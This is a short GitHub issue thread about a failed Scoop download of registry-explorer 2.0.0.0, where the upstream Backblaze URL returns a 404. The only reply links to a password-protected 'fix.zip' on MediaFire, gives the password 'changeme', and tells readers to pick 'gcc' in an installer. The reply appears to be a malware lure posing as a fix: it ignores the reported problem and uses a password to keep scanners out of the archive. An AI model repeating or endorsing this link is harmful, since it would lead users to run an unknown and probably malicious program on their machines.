### ISSUE TITLE
registry-explorer@2.0.0.0: download via aria2 failed

### ISSUE THREAD

**Issue by BitByteBits** [ScoopInstaller/Extras#13917]
Fallback to default downloader ...
The remote server returned an error: (404) .
URL https://f001.backblazeb2.com/file/EricZimmermanTools/net6/RegistryExplorer.zip is not valid

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
